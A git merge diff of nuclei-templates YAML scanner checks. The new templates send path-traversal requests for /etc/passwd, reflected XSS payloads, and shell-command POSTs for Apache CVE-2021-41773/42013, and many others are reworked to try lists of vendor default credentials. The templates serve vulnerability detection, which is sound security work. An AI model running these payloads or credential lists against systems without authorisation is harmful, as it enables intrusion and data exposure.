Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
452b4c10ea
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2015-2067
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Magento Server Magmi Plugin - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/35996
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
|
||||||
|
tags: cve,cve2015,lfi,magento
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2015-2068
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Magento Server Magmi Plugin - Cross Site Scripting
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/35996
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
|
||||||
|
tags: cve,cve2015,magento,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2017-12544
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HPE System Management - XSS
|
||||||
|
author: divya_mudgal
|
||||||
|
severity: medium
|
||||||
|
description: Reflected Cross-site scripting (XSS) on HPE System Management
|
||||||
|
reference:
|
||||||
|
- https://seclists.org/fulldisclosure/2018/Mar/5
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12544
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2017-12544
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: cve,cve2017,xss,hp
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "var prodName = '';prompt`document.domain`;//';"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2018-9205
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/44501
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
|
||||||
|
tags: cve,cve2018,lfi,drupal
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2018-9205
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2020-8641
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Lotus Core CMS 1.0.1 - Local File Inclusion
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
tags: cve,cve202,lfi,lotus
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
|
||||||
|
- https://cxsecurity.com/issue/WLB-2020010234
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.80
|
||||||
|
cve-id: CVE-2020-8641
|
||||||
|
cwe-id: CWE-22
|
||||||
|
description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter."
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,29 +1,40 @@
|
||||||
id: CVE-2021-41773
|
id: CVE-2021-41773
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Apache 2.4.49 - Path Traversal
|
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: critical
|
||||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
||||||
- https://twitter.com/ptswarm/status/1445376079548624899
|
- https://twitter.com/ptswarm/status/1445376079548624899
|
||||||
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
||||||
tags: cve,cve2021,lfi,apache,misconfig
|
- https://github.com/blasty/CVE-2021-41773
|
||||||
|
tags: cve,cve2021,lfi,rce,apache,misconfig
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers-condition: and
|
- |
|
||||||
|
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
name: LFI
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0"
|
- "root:.*:0:0"
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
name: RCE
|
||||||
- 200
|
words:
|
||||||
|
- "CVE-2021-41773"
|
|
@ -2,7 +2,7 @@ id: CVE-2021-42013
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
|
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
|
||||||
author: nvn1729
|
author: nvn1729,0xd0ff9
|
||||||
severity: critical
|
severity: critical
|
||||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
|
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
|
||||||
reference:
|
reference:
|
||||||
|
@ -18,14 +18,24 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
|
|
||||||
|
- |+
|
||||||
|
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev
|
||||||
|
|
||||||
unsafe: true
|
unsafe: true
|
||||||
matchers-condition: and
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
name: LFI
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0"
|
- "root:.*:0:0"
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
name: RCE
|
||||||
- 200
|
words:
|
||||||
|
- "CVE-2021-42013"
|
|
@ -7,16 +7,27 @@ info:
|
||||||
tags: ucmdb,default-login
|
tags: ucmdb,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;"
|
POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
|
||||||
body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB"
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- diagnostics
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "LWSSO_COOKIE_KEY"
|
- "LWSSO_COOKIE_KEY"
|
||||||
part: header
|
|
||||||
|
|
|
@ -17,23 +17,18 @@ requests:
|
||||||
Accept: application/json, text/plain, */*
|
Accept: application/json, text/plain, */*
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
{"userName":"admin","password":"cs141-snmp"}
|
{"userName":"{{user}}","password":"{{pass}}"}
|
||||||
|
|
||||||
- |
|
attack: pitchfork
|
||||||
POST /api/login HTTP/1.1
|
payloads:
|
||||||
Host: {{Hostname}}
|
user:
|
||||||
Accept: application/json, text/plain, */*
|
- admin
|
||||||
Content-Type: application/json
|
- engineer
|
||||||
|
- guest
|
||||||
{"userName":"engineer","password":"engineer"}
|
pass:
|
||||||
|
- cs141-snmp
|
||||||
- |
|
- engineer
|
||||||
POST /api/login HTTP/1.1
|
- guest
|
||||||
Host: {{Hostname}}
|
|
||||||
Accept: application/json, text/plain, */*
|
|
||||||
Content-Type: application/json
|
|
||||||
|
|
||||||
{"userName":"guest","password":"guest"}
|
|
||||||
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -7,14 +7,23 @@ info:
|
||||||
tags: apache,activemq,default-login
|
tags: apache,activemq,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/admin/'
|
GET /admin/ HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: "Basic YWRtaW46YWRtaW4="
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- user
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- user
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- 'Welcome to the Apache ActiveMQ Console of <b>'
|
- 'Welcome to the Apache ActiveMQ Console of <b>'
|
||||||
- '<h2>Broker</h2>'
|
- '<h2>Broker</h2>'
|
||||||
condition: and
|
condition: and
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Adobe AEM Default Login
|
name: Adobe AEM Default Login
|
||||||
author: random-robbie
|
author: random-robbie
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: aem,default-login,fuzz
|
tags: aem,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -15,35 +15,22 @@ requests:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}/libs/granite/core/content/login.html
|
Referer: {{BaseURL}}/libs/granite/core/content/login.html
|
||||||
|
|
||||||
_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
|
_charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
payloads:
|
payloads:
|
||||||
|
aem_user:
|
||||||
rr_username:
|
|
||||||
- admin
|
- admin
|
||||||
- grios
|
- grios
|
||||||
- replication-receiver
|
- replication-receiver
|
||||||
- vgnadmin
|
- vgnadmin
|
||||||
- aparker@geometrixx.info
|
|
||||||
- jdoe@geometrixx.info
|
|
||||||
- james.devore@spambob.com
|
|
||||||
- matt.monroe@mailinator.com
|
|
||||||
- aaron.mcdonald@mailinator.com
|
|
||||||
- jason.werner@dodgit.com
|
|
||||||
|
|
||||||
rr_password:
|
aem_pass:
|
||||||
- admin
|
- admin
|
||||||
- password
|
- password
|
||||||
- replication-receiver
|
- replication-receiver
|
||||||
- vgnadmin
|
- vgnadmin
|
||||||
- aparker
|
|
||||||
- jdoe
|
|
||||||
- password
|
|
||||||
- password
|
|
||||||
- password
|
|
||||||
- password
|
|
||||||
|
|
||||||
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
|
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -53,7 +40,7 @@ requests:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- login-token
|
- login-token
|
||||||
- crx.default
|
- crx.default
|
||||||
condition: and
|
|
||||||
|
|
|
@ -7,21 +7,29 @@ info:
|
||||||
tags: alibaba,default-login
|
tags: alibaba,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/api/v1/user/login"
|
POST /api/v1/user/login HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
body: |
|
|
||||||
{"username":"admin","password":"123456"}
|
{"username":"{{user}}","password":"{{pass}}"}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
user:
|
||||||
|
- admin
|
||||||
|
pass:
|
||||||
|
- 123456
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- 'data":{"token"'
|
- 'data":{"token"'
|
||||||
- '"code":20000'
|
- '"code":20000'
|
||||||
condition: and
|
|
||||||
|
|
|
@ -7,11 +7,17 @@ info:
|
||||||
tags: ambari,default-login
|
tags: ambari,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name'
|
GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: "Basic YWRtaW46YWRtaW4="
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -21,8 +21,14 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Referer: {{BaseURL}}/admin/airflow/login
|
Referer: {{BaseURL}}/admin/airflow/login
|
||||||
|
|
||||||
username=airflow&password=airflow&_csrf_token={{csrf_token}}
|
username={{username}}&password={{password}}&_csrf_token={{csrf_token}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- airflow
|
||||||
|
password:
|
||||||
|
- airflow
|
||||||
|
attack: pitchfork
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
name: csrf_token
|
name: csrf_token
|
||||||
|
|
|
@ -21,11 +21,18 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Referer: {{BaseURL}}/admin/airflow/login
|
Referer: {{BaseURL}}/admin/airflow/login
|
||||||
|
|
||||||
csrf_token={{csrff_token}}&username=admin&password=admin
|
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
name: csrff_token
|
name: csrf_token
|
||||||
group: 1
|
group: 1
|
||||||
part: body
|
part: body
|
||||||
internal: true
|
internal: true
|
||||||
|
|
|
@ -7,23 +7,31 @@ info:
|
||||||
tags: arl,default-login
|
tags: arl,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/api/user/login"
|
POST /api/user/login HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Content-Type: application/json; charset=UTF-8
|
Content-Type: application/json; charset=UTF-8
|
||||||
body: |
|
|
||||||
{"username":"admin","password":"arlpass"}
|
{"username":"{{username}}","password":"{{password}}"}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- arlpass
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
condition: and
|
||||||
words:
|
words:
|
||||||
- '"message": "success"'
|
- '"message": "success"'
|
||||||
- '"username": "admin"'
|
- '"username": "admin"'
|
||||||
- '"type": "login"'
|
- '"type": "login"'
|
||||||
condition: and
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -7,13 +7,27 @@ info:
|
||||||
tags: axis,apache,default-login
|
tags: axis,apache,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/axis2-admin/login"
|
POST /axis2-admin/login HTTP/1.1
|
||||||
- "{{BaseURL}}/axis2/axis2-admin/login"
|
Host: {{Hostname}}
|
||||||
headers:
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
body: "userName=admin&password=axis2&submit=+Login+"
|
loginUsername={{username}}&loginPassword={{password}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /axis2/axis2-admin/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
userName={{username}}&password={{password}}&submit=+Login+
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- axis2
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -14,8 +14,14 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
action=login&username=admin&password=admin
|
action=login&username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -7,15 +7,26 @@ info:
|
||||||
tags: chinaunicom,default-login
|
tags: chinaunicom,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/cu.html"
|
POST /cu.html HTTP/1.1
|
||||||
body: "frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password="
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- CUAdmin
|
||||||
|
password:
|
||||||
|
- CUAdmin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 302
|
- 302
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "/menu.gch"
|
- "/menu.gch"
|
||||||
|
|
|
@ -6,11 +6,19 @@ info:
|
||||||
tags: dell,idrac,default-login
|
tags: dell,idrac,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/data/login"
|
POST /data/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
body: "user=root&password=calvin"
|
user={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- root
|
||||||
|
password:
|
||||||
|
- calvin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
Content-Type: "application/x-www-form-urlencode"
|
Content-Type: "application/x-www-form-urlencode"
|
||||||
|
|
|
@ -11,8 +11,15 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /sysmgmt/2015/bmc/session HTTP/1.1
|
POST /sysmgmt/2015/bmc/session HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User: "root"
|
User: "{{username}}"
|
||||||
Password: "calvin"
|
Password: "{{password}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- root
|
||||||
|
password:
|
||||||
|
- calvin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -9,11 +9,18 @@ info:
|
||||||
tags: dell,emc,ecom,default-login
|
tags: dell,emc,ecom,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}'
|
GET / HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- root
|
||||||
|
password:
|
||||||
|
- calvin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -7,12 +7,25 @@ info:
|
||||||
tags: druid,default-login
|
tags: druid,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/druid/submitLogin"
|
POST /druid/submitLogin HTTP/1.1
|
||||||
- "{{BaseURL}}/submitLogin"
|
Host: {{Hostname}}
|
||||||
|
|
||||||
body: "loginUsername=admin&loginPassword=admin"
|
loginUsername={{username}}&loginPassword={{password}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /submitLogin HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
loginUsername={{username}}&loginPassword={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -20,7 +20,14 @@ requests:
|
||||||
Cookie: PHPSESSID={{session}}; security=low
|
Cookie: PHPSESSID={{session}}; security=low
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
username=admin&password=password&Login=Login&user_token={{token}}
|
username={{username}}&password={{password}}&Login=Login&user_token={{token}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- password
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -15,7 +15,14 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
action=login&u=admin&p=admin256
|
action=login&u={{username}}&p={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin256
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
